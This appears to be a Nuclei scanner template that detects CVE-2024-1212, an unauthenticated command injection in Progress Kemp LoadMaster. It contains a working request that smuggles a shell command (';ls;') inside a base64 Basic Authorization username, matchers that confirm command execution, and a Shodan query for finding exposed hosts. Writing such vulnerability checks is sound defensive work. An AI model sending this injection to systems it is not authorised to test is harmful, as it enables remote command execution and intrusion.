48 lines
1.7 KiB
YAML
48 lines
1.7 KiB
YAML
id: CVE-2024-1212
|
|
|
|
info:
|
|
name: Progress Kemp LoadMaster - Command Injection
|
|
author: DhiyaneshDK
|
|
severity: critical
|
|
description: |
|
|
Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.
|
|
reference:
|
|
- https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster
|
|
- https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
|
|
- https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-1212
|
|
- https://freeloadbalancer.com/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cve-id: CVE-2024-1212
|
|
cwe-id: CWE-78
|
|
epss-score: 0.00213
|
|
epss-percentile: 0.59325
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: html:"LoadMaster"
|
|
tags: cve,cve2024,progress,rce,loadmaster
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/access/set?param=enableapi&value=1"
|
|
headers:
|
|
Authorization: "Basic JztsczsnOmRvZXNub3RtYXR0ZXI="
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "bin"
|
|
- "mnt"
|
|
- "WWW-Authenticate: Basic"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100a8cb14bf9520061060c46e11d3791ffe34692d43161a7f26c48b42ee00ee9825022100956f14600e498f116c051bbb9247841a554650ce88f40b6142f4f16f0bc7deeb:922c64590222798bb761d5b6d8e72950 |